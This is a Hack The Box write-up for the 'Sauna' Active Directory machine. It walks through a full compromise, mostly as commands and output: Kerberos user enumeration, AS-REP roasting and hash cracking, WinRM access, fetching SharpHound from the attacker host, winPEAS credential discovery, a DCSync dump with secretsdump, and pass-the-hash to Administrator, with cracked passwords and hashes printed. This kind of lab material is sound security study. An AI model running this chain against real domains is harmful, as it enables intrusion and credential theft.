Sauna
Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| # Nmap 7.95 scan initiated Mon Jun 2 08:35:05 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up, received echo-reply ttl 127 (0.070s latency).
Scanned at 2025-06-02 08:35:07 CDT for 63s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-02 12:17:14Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1h18m06s
| smb2-time:
| date: 2025-06-02T12:17:22
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35558/tcp): CLEAN (Timeout)
| Check 2 (port 50793/tcp): CLEAN (Timeout)
| Check 3 (port 57297/udp): CLEAN (Timeout)
| Check 4 (port 16897/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 2 08:36:10 2025 -- 1 IP address (1 host up) scanned in 65.47 seconds
|
SMB Enumeration
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec smb 10.10.10.175 -u '' -p '' --shares
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
SMB 10.10.10.175 445 SAUNA [-] Error enumerating shares: STATUS_ACCESS_DENIED
|
HTTP Enumeration
Gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ gobuster dir -u http://egotistical-bank.local -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://egotistical-bank.local
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/Images (Status: 301) [Size: 160] [--> http://egotistical-bank.local/Images/]
/css (Status: 301) [Size: 157] [--> http://egotistical-bank.local/css/]
/fonts (Status: 301) [Size: 159] [--> http://egotistical-bank.local/fonts/]
/images (Status: 301) [Size: 160] [--> http://egotistical-bank.local/images/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
|
Username Harvest
We gathered a list of employee names. I’ll use username-anarchy to generate a list of possible common usernames.
1
2
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ ~/Documents/tools/username-anarchy/username-anarchy --input-file ./users.txt > users-full.txt
|
Kerbrute
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| ┌──(wzwr㉿kali)-[~/Documents/tools/kerbrute/dist]
└─$ ./kerbrute_linux_arm64 userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL ~/Documents/htb/sauna/users-full.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 06/02/25 - Ronnie Flathers @ropnop
2025/06/02 08:49:51 > Using KDC(s):
2025/06/02 08:49:51 > 10.10.10.175:88
2025/06/02 08:49:51 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:9c848fdc2ce6c718fb603dca1d0e57c9$70c144cd86d63f9980fb13302fcc8d80e7b5c047d859d2a86f81f1bfbf617da8829e6abbfe3a06cff8f01616f7f4bab91308cd1502b6c4cf036a0b0a3487da64604b1895b69e7591929402f7dfaf7c89f0dee81fe233f304ee750ad0d39a06000ff9287fa6ef5582bdcd86390d7d754fadfc0d79dc5cd735075a834d61beaac297db2ac09e2e6322434c5f8eb08a02efd05d3f436eabd7273579561c4fdaeb05ae39a90a0a93a2204c22cd7de1e77f5a8653a061e6d2148ea8fef85636df671699e0967155c99428c61d4ccb4fc7f0babf3607527736d006a4c0c99975313ebb4eaa777079a61661149853f3150acf4838dc3629f62ded70e580f81844e43d2edcd1457036d33035d29f670fbc240a32cd4e0e5088d7
2025/06/02 08:49:51 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2025/06/02 08:49:51 > Done! Tested 88 usernames (1 valid) in 0.698 seconds
|
Nice! We found a user with Kerberos Pre-Authentication disabled. However, I couldn’t crack this hash for some reason…
We can try use GetNPUsers.
1
2
3
4
5
6
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ sudo impacket-GetNPUsers -dc-ip 10.10.10.175 -request -outputfile hashes.asreproast 'EGOTISTICAL-BANK.LOCAL/fsmith' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:451a4893469419050736f0d18888bb8d$ef118cef119ef7ed87946a5fd46503e7c53696577d4f37d65393eaffe5284c1cc1ddd81a5b74fd4333fbc336f451435d92a2689e8f98ab5f870d01213a23f296e263151a9117a98bc2e163743221dd88ac14c0d8c9edfabfddf5d76a89e3af16927e829a9abf41eef27aa34cef4097cf7c8dffb7a22746db09e68a029d293a0bc1ca80d22d2f6df40c06ef0266089fb50f2b54a7000482badf6618132bafe77a0f7fd17eb7f5d8311066fdbfaf79002be2293783a9395506a22d047486f5507b77ec2000d396d7a2eb61e4ec7e21511811f60190eb60290a371bb3768ff9800d141cc842eefd080d05379a20858e16c1c19c3916400216695b1637be9c0422d5
|
Let’s try to crack this hash again.
1
2
3
4
5
6
7
8
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ sudo hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:451a4893469419050736f0d18888bb8d$ef118cef119ef7ed87946a5fd46503e7c53696577d4f37d65393eaffe5284c1cc1ddd81a5b74fd4333fbc336f451435d92a2689e8f98ab5f870d01213a23f296e263151a9117a98bc2e163743221dd88ac14c0d8c9edfabfddf5d76a89e3af16927e829a9abf41eef27aa34cef4097cf7c8dffb7a22746db09e68a029d293a0bc1ca80d22d2f6df40c06ef0266089fb50f2b54a7000482badf6618132bafe77a0f7fd17eb7f5d8311066fdbfaf79002be2293783a9395506a22d047486f5507b77ec2000d396d7a2eb61e4ec7e21511811f60190eb60290a371bb3768ff9800d141cc842eefd080d05379a20858e16c1c19c3916400216695b1637be9c0422d5:Thestrokes23
...
|
Success! This time we cracked the hash and got the password. Let’s verify it with crackmapexec.
1
2
3
4
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec smb 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
|
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> cat ../Desktop/user.txt
68c1e0f7a888e631c4d734277eee73e8
*Evil-WinRM* PS C:\Users\FSmith\Documents>
|
Post-Exploitation
Quick Check
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| *Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\FSmith\Documents>
|
Let’s gather domain information first using BloodHound!
Bloodhound
1
2
3
4
5
6
7
8
9
| *Evil-WinRM* PS C:\Users\FSmith\Documents> ls
*Evil-WinRM* PS C:\Users\FSmith\Documents> iwr -uri http://10.10.16.24/SharpHound.ps1 -Outfile SharpHound.ps1
*Evil-WinRM* PS C:\Users\FSmith\Documents> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\FSmith\Documents\ -OutputPrefix "htb"
|
Note that if we own the SAUNA.EGOTISTICAL-BANK.LOCAL machine (which we currently have access to), we can abuse DCSync to dump domain user credentials!
Another possible attack vector is svc_loanmgr, which has DCSync rights over the domain. If we compromise this account, we can abuse it.
winPEASx64
1
2
3
4
5
| ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
|
We found credentials! Let’s verify them.
1
2
3
4
5
6
7
8
9
10
11
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'svc_loanmanager' -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround!
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
|
In this case, we can use secretsdump to abuse DCSync
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ sudo impacket-secretsdump "EGOTISTICAL-BANK.LOCAL/svc_loanmgr":'Moneymakestheworldgoround!'@10.10.10.175
[sudo] password for wzwr:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:c4f376075912ca7f2577a8316ed9535a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ecc3ef9be8e65f6ef07bfcb8f230ac4d9f214aacc499e6c078b8eb95cba96cab
SAUNA$:aes128-cts-hmac-sha1-96:022575cf79a79f1bdb25336499c92cfe
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
|
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)
|
